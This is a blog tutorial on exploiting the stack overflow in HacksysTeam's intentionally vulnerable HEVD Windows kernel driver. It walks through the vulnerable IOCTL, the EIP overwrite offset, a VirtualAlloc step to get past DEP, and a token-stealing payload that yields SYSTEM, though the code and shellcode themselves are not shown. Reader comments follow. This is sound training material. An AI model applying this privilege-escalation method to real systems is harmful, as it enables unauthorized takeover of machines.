Windows Kernel Exploitation Tutorial Part 2: Stack Overflow


Overview

In the part 1, we looked into how to manually setup the environment for Kernel Debugging. If something straightforward is what you want, you can look into this great writeup by hexblog about setting up the VirtualKd for much faster debugging.

In this post, we’d dive deep into the kernel space, and look into our first Stack Overflow example in kernel space through driver exploitation.

A shoutout to hacksysteam for the vulnerable driver HEVD, and fuzzySecurity, for a really good writeup on the topic.


Setting up the driver

For this tutorial, we’d be exploiting the stack overflow module in the HEVD driver. Download the source from github, and either you can build the driver yourself from the steps mentioned on the github page, or download the vulnerable version here and select the one according to the architecture (32-bit or 64-bit).

Then, just load the driver in the debugee VM using the OSR Loader as shown below:

OSR

Check if the driver has been successfully loaded in the debugee VM.

There’s also a .pdb symbol file included with the driver, which you can use as well.

Once the driver is successfully loaded, we can now proceed to analyze the vulnerability.


Analysis

If we look into the source code of the driver, and see the StackOverflow.c file, hacksysteam has done a really good job in demonstrating both the vulnerable and the secure version of the driver code.

Here we see that in the insecure version, RtlCopyMemory() is taking the user supplied size directly without even validating it, whereas in the secure version, the size is limited to the size of the kernel buffer. This vulnerability in the insecure version enables us to exploit the stack overflow vulnerability.

Let’s analyze the driver in IDA Pro, to understand how and where the Stack Overflow module is triggered:

ida1

From the flow, let’s analyze the IrpDeviceIoCtlHandler call.

ida2

We see that if the IOCTL is 0x222003h, the pointer jumps to the StackOverflow module. So, we now have the way to call the Stack Overflow module, let’s look into the TriggerStackOverflow function.

Ida3

Important thing to note here is the length defined for the KernelBuffer, i.e. 0x800h (2048).


Exploitation

Now that we have all the relevant information, let’s start building our exploit. I’d be using DeviceIoControl() to interact with the driver, and python to build our exploit.

Let’s fire up the WinDbg in debugger machine, put a breakpoint at TriggerStackOverflow function and analyze the behavior when we send the data of length 0x800h (2048).

Windbg1

What we see is, that though our breakpoint is hit, there’s no overflow or crash that occured. Let’s increase the buffer size to 0x900 (2304) and analyze the output.

Windbg2

Bingo, we get a crash, and we can clearly see that it’s a vanilla EIP overwrite, and we are able to overwrite EBP as well.

Through the classic metasploit’s pattern create and offset scripts, we can easily figure out the offset for EIP, and adjusting for the offset, the script looks like:

windbg3

Now that we have the control of EIP and have execution in kernel space, let’s proceed with writing our payload.

Because of the DEP, we can’t just execute the instructions directly passed onto the stack, apart from return instructions. There are several methods to bypass DEP, but for the simplicity, I’d be using VirtualAlloc() to allocate a new block of executable memory, and copy our shellcode in that to be executed.

And for our shellcode, I’d be using the sample token stealing payload given by the hacksysteam in their payloads.c file.

Basically this shellcode saves the register state, finds the current process token and saves it, then finds the SYSTEM process pid, extracts the SYSTEM process token, replace the current process’s token with the SYSTEM process token, and restore the registers. As Windows 7 has SYSTEM pid 4, the shellcode can be written as:

But we soon hit a problem here during execution:

Windbg4

We see that our application recovery mechanism is flawed, and though our shellcode is in memory and executing, the application isn’t able to resume its normal operations. So, we would need to modify and add the instructions that we overwrote, which should help the driver resume it’s normal execution flow. Let’s analyze the behaviour of the application normally, without the shellcode.

Windbg5

We see that we just need to add pop ebp and ret 8 after our shellcode is executed for the driver recovery. The final shellcode, after this, becomes:

And W00tW00t, we get the nt authority\system privileges, successfully exploiting our vulnerability.

system

7 thoughts on “Windows Kernel Exploitation Tutorial Part 2: Stack Overflow

  1. Spot on witth this write-up, I truly feel this site needs a great deal
    more attention. I’ll probably be returning to read through
    more, thanks for the advice!

  2. Thank you for your article. I have a little question.

    You are allocating memory with VirtualAlloc in layout of your python process, but how it is accessed from kernelmode? As i understand this is only for your process virtual memory. Is kernel driver attaches to process that called IOCTL or what?

    Thanks.

Leave a Reply

Your email address will not be published. Required fields are marked *